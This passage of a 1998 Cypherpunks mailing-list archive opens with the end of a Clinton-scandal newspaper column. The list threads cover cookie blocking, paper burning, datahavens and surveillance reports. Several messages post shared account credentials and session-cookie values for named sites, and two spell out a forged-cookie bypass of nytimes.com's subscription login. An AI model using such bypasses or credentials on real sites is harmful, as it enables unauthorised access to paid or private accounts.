      In the delirium of the scandal, something remarkable
      occurred.  The President reportedly admitted, in a
      deposition to Paula Jones's lawyers, that, oh, yeah,
      by the way, he did have that affair with Gennifer
      Flowers, which he so adamantly denied during the '92
      campaign. <p>
      
      I still remember James Carville ranting at reporters
      for being low enough to pay any mind to her, calling
      it cash for trash. <p>
      
      How can he go back on TV and defend Mr. Clinton in
      another sex scandal by once more trying to throw doubt
      on another damning tape? <p>
      
      At least Mr. Carville looked sheepish.  Mr. Clinton's 
      famous rapid-response team seems to have bimbo-battle 
      fatigue. <p>
      
      The tapes of Monica Lewinsky, now 24, seem believable,
      not least because we heard it all before with Gennifer
      Flowers.  Helping to get her a new job, telling her to
      say nothing went on if anyone asked.  "Deny it," Mr.
      Clinton told Ms. Flowers on tape.  "That's all.  I
      mean, I expect them to come look into it and interview
      you and everything.  But I just think if everybody's
      on record denying it, you've got no problem."  The
      whole modus operandi is right there. <p>
      
      Also, why did Vernon Jordan become a patron to a lowly
      Pentagon assistant if she was nothing special to the
      President? <p>
      
      The reality that looms before the American people is
      not the impeachment of this President.  It is the
      annulment of this President.  He has finally
      determined his own place in history.  He will be
      remembered as the priapic President.  The Oval Office
      appears to be the bachelor pad of a married man who is
      the Commander in Chief.  Like all addicts, this one is
      surrounded by enablers. <p>
      
      Many Americans had accepted Mr. Clinton as a charming
      rogue.  But the portrait that may be pieced together
      from the confessions of his willing and unwilling
      women now looks utterly uncharming.  Ms. Lewinsky's
      nickname for him -- "the big creep" -- could stick. <p>
      
      The Clinton doctrine may turn out to be nothing more
      than a view of the relationship of oral sex -- or Oval
      sex -- to adultery.  CNN's Judy Woodruff reported that
      religious scholars could find no biblical basis for
      Mr. Clinton's purported claim to an Arkansas trooper
      that the Bible says oral sex is not cheating. <p>
      
      Ted Koppel actually began "Nightline" Thursday with
      the following sentence:  "It may . . . ultimately come
      down to the question of whether oral sex does or does
      not constitute adultery." <p>
      
      Well, it sure isn't fidelity. <p>
      
      When Mr. Clinton says now that he can't answer
      questions about sex, lies and tapes because he must
      hurry back to governance, people will want him to
      hurry back to self-governance instead. <p>

    </td>
    <td bgcolor="f0f0a0" align=center valign=middle width=5> &nbsp; </td>
    <td bgcolor="f0f0e0" align=center valign=middle width=10> &nbsp; </td>
  </tr>
  <tr height=5>
    <td bgcolor="f0f0e0" align=center valign=middle width=10> &nbsp; </td>
    <td bgcolor="f0f0a0" align=center valign=middle width=5> &nbsp; </td>
    <td align=left valign=middle> &nbsp; </td>
    <td bgcolor="f0f0a0" align=center valign=middle width=5> &nbsp; </td>
    <td bgcolor="f0f0e0" align=center valign=middle width=10> &nbsp; </td>
  </tr>
</table></center></body></html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 26 Jan 1998 01:25:16 +0800
To: cypherpunks@cyberpass.net
Subject: Tossing your cookies [Re: Why no "Banner Ad Eaters"?]
In-Reply-To: <md5:CEDBAC6CF351AB65AB53DEAC6B3C5702>
Message-ID: <34CB736A.CC97CCEF@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Heinz-Juergen Keller skribis:
> Just a silly? question on cookies:
> What will happen if I just link cookies.txt to /dev/null ?
> Is there anything speaking against this solution?

Works fine on Unix and Linux systems if you're not a cookie fan:
the remote sites think you've eaten their cookies, but you've
merely frisbeed them into the bit bin.

It's better than telling Netscape you want to be asked: some
sites set a dozen cookies per hit, seems like, and saying "no"
to each gets immediately tedious.  If you tell Netscape to reject
them, some sites won't serve you the content.  Setting the browser
to accept everything and linking cookies.txt to /dev/null works
well for me.

-- 
	Jim Gillogly
	Highday, 4 Solmath S.R. 1998, 17:05
	12.19.4.15.14, 5 Ix 12 Muan, Eighth Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Sun, 25 Jan 1998 17:49:39 +0800
To: Tim May <cypherpunks@cyberpass.net>
Subject: Re: Clinton needs a war with Iraq
In-Reply-To: <v03102800b0f007a3850a@[207.167.93.63]>
Message-ID: <19980125.091156.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980124:1306, in <v03102800b0f007a3850a@[207.167.93.63]>, 
    Tim May <tcmay@got.net> was purported to have 
    expostulated to perpetuate an opinion:

>There are increasing reports, from Washington and Baghdad, that Clinton
>wants a nice little war action in Iraq, which would have the side effect
>of boosting his support...or so he hopes.
>

    since the Korean war, American involvement in foreign wars, 
    or the war effort, has escalated in relationship to the 
    needs of the economy --the war effort boosts industrial
    utilization --eg money and the economy-- and Americans vote 
    with their pocketbooks.
    
    Clinton just might be dumb enough to consider a war footing
    would take the collective minds off his incredible stupidity
    --the man is literally being led around by his crank; bubba 
    must have heard too many stories about hairy palms...
    
    as Maureen said in the Times, most Americans had accepted 
    that Clinton was a charming rogue --but this last round is
    exposing the callous disregard for not only women, but truth
    and respect for privilege-- that is the end of confidence, 
    and like any relationship, the loss of confidence is 
    self-destructive.
    
    the concern should be for the troops who could be left 
    standing in the desert whistling Dixie...  Bush was able to 
    rally support from foreign powers, which led to domestic
    support, primarily due to his good report and respect from
    foreign leaders --bubba is a laughing stock; who will follow
    his flag.
    
    if the tapes are even close to real, Clinton needs to take 
    helicopter one to Andrews and fade into history --NOW. the 
    thought of Al Bore in the Presidency is appalling --but it 
    certainly can not be any worse than bubba. al bore will be 
    intractable with the Republican Congress, but so what else 
    is new? --at least they can not create bad law!

>If this happens, it may be time for hackers to use technical means to
>disrupt the war effort.

    I frankly dont believe you made that suggestion --the damage
    would not be to the government, but to our fellow citizens
    who have been ordered to commence action. I did not agree 
    with what I was orderer to do, but I did not place the lives
    of my dependent troops in danger for my beliefs --I resigned
    the commission eventually and have been a foe of their 
    dishonest foreign policy ever since.
    
    regardless of the immorality and stupidity of Clinton, there
    is no justification, and certainly no honour, for permitting
    KIA American troops to be dumped into the spectacle of being
    dragged through the streets of Somalia, etc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNMsH+7R8UA6T6u61AQF5uQH9EfDnTjZWhWqXvagb8a56WPVjyGSlD7zA
KNvsPeNppG4SDLbTweQCBcVnVd3y7Yx+z1z54K9Qc3RmBPcXk/Gy3Q==
=Dtra
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gregory L. Robinson" <lordsmen@iquest.net>
Date: Sun, 25 Jan 1998 23:39:30 +0800
To: <cypherpunks@toad.com>
Subject: Unabomber's Background
Message-ID: <199801251525.HAA21906@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Could someone please post Mr. Kaczynski's (sp?) education background and
some bio information or point me towards a website that contains some?

Greg Robinson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 26 Jan 1998 03:18:48 +0800
To: Jim Gillogly <jim@acm.org>
Subject: Re: Tossing your cookies [Re: Why no "Banner Ad Eaters"?]
In-Reply-To: <md5:CEDBAC6CF351AB65AB53DEAC6B3C5702>
Message-ID: <3.0.5.32.19980125110902.03834b80@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 09:16 AM 1/25/98 -0800, Jim Gillogly wrote:
>
>Heinz-Juergen Keller skribis:
>> Just a silly? question on cookies:
>> What will happen if I just link cookies.txt to /dev/null ?
>> Is there anything speaking against this solution?
>
>Works fine on Unix and Linux systems if you're not a cookie fan:
>the remote sites think you've eaten their cookies, but you've
>merely frisbeed them into the bit bin.
>
>It's better than telling Netscape you want to be asked: some
>sites set a dozen cookies per hit, seems like, and saying "no"
>to each gets immediately tedious.  If you tell Netscape to reject
>them, some sites won't serve you the content.  Setting the browser
>to accept everything and linking cookies.txt to /dev/null works
>well for me.

You can also make the cookie.txt file read only.

Both of these options only make the cookies valid for the current session.
They do not make them go away all together.

Some of the site that cookie bomb do so out of ignorance.  Old versions of
Apache have such cookie bombing set by default.  (They changed the name of
the option soon after.  The option was originally called "Mod_cookies" and
people left it figuring that if they disabled it, they could not use
cookies.  Actually it is a method for tracking usage patterns within a
site.  The module was renamed to reflect that.)  

I am willing to bet that most of the sites that send cookies are not even
using the data they provide.  Few log file crunchers can make use of the
cookie data from user tracking in any worthwhile manner. Any company that
relies on cookies to hold onto membership information is foolish. (Cookie
files only hold 300 entries.  Surf enough and the membership infomation
gets washed away with the tide.)  Cookies are not needed for storefronts.
There are better ways to accomplish the same thing. (There are CGI
storefronts that save the information on files on the server, for instance.)

I can understand why cookies were thought up in the first place.  Much of
cgi programming is overcoming the stateless nature of http.  Unfortunatly,
the idea was not thought out that well...

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 26 Jan 1998 04:04:26 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Burning papers
In-Reply-To: <199801251819.MAA17338@manifold.algebra.com>
Message-ID: <3.0.5.32.19980125115620.007d0680@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:19 PM 1/25/98 -0600, Igor Chudov @ home wrote:
>Just for your information, I _WAS_ mistaken. The papers burned really
>well. My confusion about burnability of papers arose because in the
>past I tried to burn magazines, and not papers and letters. The whole
>big box is gone, after two burns. Burning is unquestionably better than
>shredding.

There are shredders, and then there are shredders.  The SOHO-sized
shredders that just cut things into ribbons aren't very thorough
(and it's been demonstrated that documents shredded that way can
be reassembled by sufficiently large numbers of Iranian college students)
but they're good prep for burning the papers.
On the other hand, the cross-cut shredders that leave flakes no more
than 1/8" rectangles or even smaller chad are good enough for
classified documents.

Of course, if your documents are on floppy disks, any shredder that
won't jam on them does a pretty good job :-)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Heinz-Juergen Keller <hjk@ddorf.rhein-ruhr.de>
Date: Sun, 25 Jan 1998 19:04:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Why no "Banner Ad Eaters"?
Message-ID: <Pine.LNX.3.96.980125114336.12960C-100000@alien.lummerland.de>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


"Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com> wrote:
>Junkbusters works very nicely for me. I highly recommend it.

>A warning about cookies: no proxy server I know can
>stop the server from trying to set the cookie by

>a) putting a <META HTTP-EQUIV="Cookie:" CONTENT="foo=bar;expires...">
>in the header;
[SNIP]

Installed Junkbuster yesterday with a blocklist that seems to work o.k.

Just a silly? question on cookies:
What will happen if I just link cookies.txt to /dev/null ?
Is there anything speaking against this solution?

- -------------------------------------------------------------------------------
  Heinz-Juergen Keller  hjk@[mail.]ddorf.rhein-ruhr.de   hjkeller@gmx.[net,de]
  2047bit PGP Public Key : http://www.ddorf.rhein-ruhr.de/~hjk/
  MD5 Fingerprint: 4d33126fbf8c1bcd8e96ba90d99f0bdc
- -------------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBNMsaoyZWWJBRAP1VAQE5Ugf7Bum+X0GRqAkGvp7Ir9MzpWI6XmlE01dc
TrnG1ltkhIoU7JWTSNimsBeA0Pdw0fZZJpHhyNowCb0zR/H/J7/I/ksHUJWrr+/I
eSRcO6Kwn8QlgjpDO+AfZiGtjtcm6ogPQhpLmyTFHRj6gNU+ksYTka6cC46zVfTI
oWPx1vNLMZrG7OoMep61d9RQRSIIQQRzG3Ksc/5fwldmF7IWH5+9VnOncuT7ZJLm
59rvqyO4R9CaymI47jUTfpe+XNJzZR3PHix2OBiRtiXFgJsxc014Qk/lkVDiJH8T
g+B5nE1N9xN7PqIAmMW7kuFaq4d4QhjMvYxGfa5ZCd8aPxhi5oLQMg==
=2UCV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 26 Jan 1998 02:23:45 +0800
To: cypherpunks@Algebra.COM
Subject: Burning papers
Message-ID: <199801251819.MAA17338@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Just for your information, I _WAS_ mistaken. The papers burned really
well. My confusion about burnability of papers arose because in the
past I tried to burn magazines, and not papers and letters. The whole
big box is gone, after two burns. Burning is unquestionably better than
shredding.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 26 Jan 1998 02:10:03 +0800
To: cypherpunks@toad.com
Subject: Re: Unabomber's Background
In-Reply-To: <199801251525.HAA21906@toad.com>
Message-ID: <2kiVJe55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Gregory L. Robinson" <lordsmen@iquest.net> writes:

> Could someone please post Mr. Kaczynski's (sp?) education background and
> some bio information or point me towards a website that contains some?

It's _Dr._ Kazinski.  He's got a math phd.  Who else's got one on this list?
(He used to be a tenure-track associate professor at U California Berkeley)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 26 Jan 1998 02:32:26 +0800
To: cypherpunks@toad.com
Subject: Re: Tossing your cookies [Re: Why no "Banner Ad Eaters"?]
In-Reply-To: <34CB736A.CC97CCEF@acm.org>
Message-ID: <1yiVJe59w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly <jim@acm.org> writes:

> Heinz-Juergen Keller skribis:
> > Just a silly? question on cookies:
> > What will happen if I just link cookies.txt to /dev/null ?
> > Is there anything speaking against this solution?
>
> Works fine on Unix and Linux systems if you're not a cookie fan:
> the remote sites think you've eaten their cookies, but you've
> merely frisbeed them into the bit bin.
>
> It's better than telling Netscape you want to be asked: some
> sites set a dozen cookies per hit, seems like, and saying "no"
> to each gets immediately tedious.  If you tell Netscape to reject
> them, some sites won't serve you the content.  Setting the browser
> to accept everything and linking cookies.txt to /dev/null works
> well for me.

microsoft.com, firefly.com, and parts of yahoo.com wee the only sites I found
that 1) try to set the cookie, 2) test if the cookies is what they expected,
3) refuse to proceed if the cookie isn't what they expected it to be.

Here are a few more neat wafers that I use with junkbuster:

wafer Apache=0
wafer cookieswork=1
# .hotwired.com randomhacker cypherpunks (cypherpunks was already taken
# and password wasn't cypherpunks)
wafer u=randomhacker:XXXrHYVJ4gKTg:888306120:
# barnes and noble cypherpunks
wafer userid=21200U41QE
# .ffly.com v2 random_q_hacker cypherpunks (again, cypherpunks already taken
# with a different password)
wafer NAME=random%5Fq%5Fhacker
wafer ALIAS=random%5Fq%5Fhacker
wafer FIREFLYTICKETV2=a3d11c2224f036b8c5da227f07ac7694b3430734d16595e7ff09c9216dbac8af6
wafer FFLYID=381916
# .ffly.com v3
wafer USERNAME=random$5Fq$5Fhacker
wafer USERID=4031415
wafer USERKEY=rrL2ECYFs8Q
wafer PASSWORD=rrL2ECYFs8Q
# I haven't quite gotten this wafer to work:
# .firefly.net random_q_hacker(.firefly):cypherpunks (won't let user=password)
 wafer FIREFLYTICKETV3	XWHKLLTVMLTVYWVJEHUNMHa\XVLHNHLGHIVRVUKKKKKK
# .yahoo.com cypherpunks:cypherpunks
wafer Y=v=1&n=fh5fme4ro4p10&l=2of74hfkdai/o&p=f1s022r2030r
wafer M=dp=sum&lg=us
wafer T=z=34caa94c

While this is tangentially crypto-relevant, let's start a thread on feeding
wafers to various tracking software to convince it that the same cypherpunks
entity is doing all of our browsing.  Can several of people agree on feeding
the same values of the following wafers:

# .pathfinder.com
wafer PFUID=ffffffffffffffffffffffffffffffff
# webcrawler.com
wafer AnonTrack=FFFFFFFFFFFFFFFF
# RealMedia (NYTimes et al)
wafer RMID=0
# .hotwired.com
wafer p_uniqid=0osqlPoOiF7XKIGM6D
wafer s_uniqid=0osqlPoOiF7XKIGM6D
wafer unique_id=1668800885692100
wafer NGUserID=ced54487-134-885708087-1
wafer session-id=0
wafer session-id-time=0
# .geocities.com
wafer GeoStitial=885690000
wafer GeoId=0
wafer EGSOFT_ID=0
wafer CFID=0
# .four11.com
wafer Urid=68847000
wafer DOL=0
wafer DTRACK=0

Protect your privacy by confusing the software that would violate it.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0199.myriad.ml.org (Matthew Ghio)
Date: Mon, 26 Jan 1998 03:00:22 +0800
To: cypherpunks@cyberpass.net
Subject: NYTimes web cookies
Message-ID: <199801251852.NAA20393@myriad>
MIME-Version: 1.0
Content-Type: text/plain



> Cookies and the NYTIMES subscription: NYTIMES.COM tries to store your
> userid and password in the cookie with keywords PW= and ID=. Problem is,
> it tries to encode them using 8-bit characters. Lucky for us, at this time
> NYTIMES.COM does not check if userid/password are valid, just that they're
> a part of the cookie!! So, just add these two lines to your junkbuster
> config:
> 
> wafer PW=0
> wafer ID=0
> 
> and nytimes.com will greet you as "0" and let you right in.


It doesn't check the PW or ID at all except the first time you log in.
After that it generates a new cookie titled NPLCNYT and that is the only
cookie it checks; the PW and ID are not required to be there at all.
If you delete the NPLCNYT cookie, it will check the PW/ID and generate
a new one.  An example cookie is below:

NPLCNYT=AAAALw>AAAAAX9IUUWiPhfALqHZuSh2mUM0yzNOwGRReAAAAAsAAAAAY3lwaGVycHVua3M>
                    ^^^^^^^^^^^^^^^^^^^^^^|||||#####

The characters marked ^^^ appear to be random, and change every time a new
cookie is generated.  The ones marked ##### appear to encode the originating
IP address, and ||||| appears to be date/time.  The rest don't seem to change
(tho I only tried ID=cypherpunks PW=cypherpunks).  The server will still
accept the cookie if your IP address changes.

There does seem to be some sort of checksum on the data.  While the
relatively small area it uses to store the time and IP address wouldn't seem
to leave much room for this, I wasn't able to find a spoofed cookie that it
would accept - perhaps the checksum is included in the 'random' part.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Mon, 26 Jan 1998 06:09:55 +0800
To: "John M" <estoy@hotmail.com>
Subject: Re: How to eliminate liability?
In-Reply-To: <19980123220714.7351.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980125135447.007c1100@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 02:07 PM 1/23/98 PST, John M wrote:
>but I hadn't heard of it.  I 
>have been meaning to buy Schneier's book...

Still waiting for my Dobb's CDROM too..

>meaningful information without the other parts.  Because of this, I have 
>been asking myself, how could any one datahaven operator be held 
>responsible for holding classified, porn, or other information if they 
>only have a meaningless slice of it?
>
>Perhaps this is more a legal question (even more out of my league) than 
>anything...  Any comments?

I think the essential issue is to convince the
courts that running a cryptoarchive background
process (distributed Eternity server) makes you a "Common Carrier", with
all the legal protection you get from that classification.  

I agree with you and Bill that
this is feasible once the legal profession gets a clue.. maybe in our
lifetimes :-)

The worst-case situation is a very widely 
dispersed government denying that kind of 
common-carrier status.  Imagine congress
signing something giving the UN that power,
then declaring all encrypted-anonymous-archives 
illegal.  Send a few blue-hats or a cruise missile
to take out the non-signers.  Back home: "who cares, just the UN protecting
the children, so what if
a Cayman casino or Togo bank gets toasted.  No one was hurt, and the world
is safe for imbiciles"

In such a scenario you could take other steps.
Steganography helps keep you from being noticed.
Bursty-communications patterns are harder to 
stop/trace.  CDROMs are readily manufactured
hidden, and disguised.

Perhaps the cypherpunk edition of Netscape
will include anonymous remailing / traffic mixing
services by default :-)





David Honig 			honig@alum.mit.edu
---------------------------------------------------
If we can prevent the government from wasting the labours of the people
under the pretense of
 caring for them, they will be happy.  -TJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 26 Jan 1998 04:14:27 +0800
To: bill.stewart@pobox.com (Bill Stewart)
Subject: Re: Burning papers
In-Reply-To: <3.0.5.32.19980125115620.007d0680@popd.ix.netcom.com>
Message-ID: <199801252007.OAA19838@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Bill Stewart wrote:
> Of course, if your documents are on floppy disks, any shredder that
> won't jam on them does a pretty good job :-)

I burned a couple of floppies, too. Actually I am not sure how good job
would shredding of floppies do. I assume that bits and pieces of data
can still be recovered... But hopefully no one would care enough.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 26 Jan 1998 06:06:00 +0800
To: cypherpunks@toad.com
Subject: Re: NYTimes web cookies
In-Reply-To: <199801252000.VAA04977@basement.replay.com>
Message-ID: <N1sVJe2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@REPLAY.COM (Anonymous) writes:
> ghio@temp0199.myriad.ml.org (Matthew Ghio) wrote:
>
> > It doesn't check the PW or ID at all except the first time you log in.
> > After that it generates a new cookie titled NPLCNYT and that is the only
> > cookie it checks; the PW and ID are not required to be there at all.
> > If you delete the NPLCNYT cookie, it will check the PW/ID and generate
> > a new one.  An example cookie is below:
> >
> > NPLCNYT=AAAALw>AAAAAX9IUUWiPhfALqHZuSh2mUM0yzNOwGRReAAAAAsAAAAAY3lwaGVycHVu
>
> I put this wafer in my junkbuster-configfile and disabled all other cookies,
> and NYTimes let me in without asking for a password, but after I read a few
> articles, the site started behaving strangely, where the server would seem
> to hang on certain pages, taking forever to send the html.

I played around with nytimes.com some more and I'm certain that it does check
for the presense the ID= in the cookie (but not the value).

Apparently the following 2 is necessary and sufficient:
NPLCNYT=(whatever it tried to set it to)
ID=(anything; I used ID=0 to save bandwidth)

With ID=0, it says "welcome, 0" of the first page and I see no problems.

> Interesting though.  Maybe we should hold a cypherpunks 'potluck' where
> everyone trades cookies.  :)

A good idea. here are more of mine:

#.reference.com
wafer userid=cypherpunks@bwalk.dm.com
wafer passwd=cypherpunks

(I haven't been able to register cypherpunks@algebra.com on reference.com)

# amazon.com cypherpunks@algebra.com cypherpunks
wafer group_discount_cookie=F
wafer session-id=1451-4798095-404463
wafer session-id-time=886320000
wafer ubid-main=3578-1328899-434066
wafer cf=c90fe571f7b5f873

By the way, junkbuster does NOT strip cookies in secure http. Be careful.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 26 Jan 1998 06:33:50 +0800
To: nobody@replay.com
Subject: Re: NYTimes web cookies
In-Reply-To: <199801252000.VAA04977@basement.replay.com>
Message-ID: <199801252224.RAA28834@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

| Interesting though.  Maybe we should hold a cypherpunks 'potluck' where
| everyone trades cookies.  :)

.nytimes.com    TRUE    /       FALSE   946684173       RDB
C802002E1B000055 5301026495323B0100000000000000

Anyone figured out how to get Amazon's Group-discount cookie to set to
true? :)

Incidentally, I edit my file something between daily and weekly, in
the hopes of generating bizare and worthless data for them.  I also
spend time clicking random links while on the phone to help fill my
cookie file with junk.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Mon, 26 Jan 1998 09:50:02 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: Technolgies of Political Control
In-Reply-To: <1.5.4.32.19980125234726.00bae108@pop.pipeline.com>
Message-ID: <v03102808b0f196416f65@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:47 PM -0500 1/25/98, John Young wrote:
>Thanks to Axel Horns and Ulf Mller we offer an excerpt
>of the draft European Parliament report on global
>surveillance cited in news reports recently:
>
>  An Appraisal of Technolgies of Political Control
>Scientific and Technological Options Assessment
>     Working Document (Consultation version)
>                  PE 166 499
>            Luxembourg, 6 January 1998

The report makes mention of built-in surveillence feature in CCITT compliant ISDN products.  ""What is not widely known is that built in to the international CCITT protocol is the ability to take phones 'off hook' and listen into conversations occurring near the phone, without the user being aware that it is happening."  Seems like an awful lot of CP using ISDN gear should beware.  Many ISDN devices are firmware based.  Might this not spawn a number of good crack projects to remove this feature from popular products.  I use an Ascend P25.  The docs say its CCITT compliant.  Sooo does it enable this form of surveillence?  Enquiring minds want to know.


The draft paper referneces an article in SGR Newsletter, No.4, 1993.  Is this a reference to Scientists for Global Responsibility?  Where can I read a copy of this article?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Mon, 26 Jan 1998 10:11:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: NYTimes web cookies
In-Reply-To: <199801251852.NAA20393@myriad>
Message-ID: <v0310280ab0f19f4f8fdc@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:52 PM -0500 1/25/98, Matthew Ghio wrote:
>> Cookies and the NYTIMES subscription: NYTIMES.COM tries to store your
>> userid and password in the cookie with keywords PW= and ID=. Problem is,
>> it tries to encode them using 8-bit characters. Lucky for us, at this time
>> NYTIMES.COM does not check if userid/password are valid, just that they're
>> a part of the cookie!! So, just add these two lines to your junkbuster
>> config:
>> 
>> wafer PW=0
>> wafer ID=0
>> 
>> and nytimes.com will greet you as "0" and let you right in.
>
>
>It doesn't check the PW or ID at all except the first time you log in.
>After that it generates a new cookie titled NPLCNYT and that is the only
>cookie it checks; the PW and ID are not required to be there at all.
>If you delete the NPLCNYT cookie, it will check the PW/ID and generate
>a new one.  An example cookie is below:
>
>NPLCNYT=AAAALw>AAAAAX9IUUWiPhfALqHZuSh2mUM0yzNOwGRReAAAAAsAAAAAY3lwaGVycHVua3M>


Anyone have something similar for the WSJ?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 26 Jan 1998 15:09:27 +0800
To: RPK New Zealand Ltd <cypherpunks@cyberpass.net
Subject: Re: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <3.0.5.32.19980125184413.0086fd20@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I was amused to receive two mail messages back-to-back,
one from Peter Gutmann talking about New Zealand having one of the
strictest formal export controls in the world, and one from
RPK New Zealand talking about how their encryption product is
not export-controlled because it's from NZ, not the US,
and how their RPK Fast Public Key Encryptonite(tm) Engine
is the strongest crypto in the world.  Either they haven't
bothered asking for export permission, or they asked in such a way
that the export bureaucrats didn't notice it was crypto and
regulated by their crypto export preventers, or their crypto
somehow falls through the cracks, e.g. by using an algorithm with
public keys shorter than 512 bits (works for ECC, not RSA)
and private keys shorter than 40 bits (or 41 on a good day),
or perhaps passes the "snake oil test" for export permission.
I suppose it's possible that the NZ Export Bureaucrats have
lightened up since Peter's last dealings with them,
but it's not likely.

>--------------- The mail, referencing www.invisimail.com
>RPK New Zealand Ltd. in a joint venture with Virtually Online Ltd. 
>has released RPK InvisiMail, a standards-based e-mail security 
>application for use with Internet mail software (SMTP/POP3).  
>The product offers the strongest encryption available anywhere in 
>the world.  Since it was built outside the United States, 
>it is also available all over the world with strong encryption.  
>RPK InvisiMail is also the easiest product of its type
>to setup and use which makes it quite unique.

========= From Peter Gutmann's web page
This policy has resulted in New 
Zealand enjoying the dubious distinction of having the strictest export 
controls on earth, with everything ranging from crypto hardware down to 
software, library books, computer magazines, and journals being restricted 
from export.  It's not even possible for a university to publish academic 
research without prior permission from a government agency, and the 
requirements for obtaining this permission are structured to ensure that they 
can never be fulfilled.  You can find the information on:
 
  http://www.cs.auckland.ac.nz/~pgut001/policy/

==============================
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Jan 1998 07:56:00 +0800
To: cypherpunks@toad.com
Subject: Technolgies of Political Control
Message-ID: <1.5.4.32.19980125234726.00bae108@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to Axel Horns and Ulf Mller we offer an excerpt
of the draft European Parliament report on global
surveillance cited in news reports recently:

  An Appraisal of Technolgies of Political Control
Scientific and Technological Options Assessment
     Working Document (Consultation version)
                  PE 166 499
            Luxembourg, 6 January 1998

The report covers:

- The Role & Function of Political Control Technologies
- Recent Trends and Innovations
- Developments in Surveillance Technologies
- Innovations in Crowd Control Weapons
- New Prison Control Systems
- Interrogation, Torture Techniques and Technologies
- Regulation of Horizontal Proliferation
- Further Research

See excerpt: 

   http://jya.com/atpc.htm

Printed copies are available from the staff of the British MEP Glyn
Ford (tel +322 2843748 fax +322 2849059, jford@europarl.eu.int).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
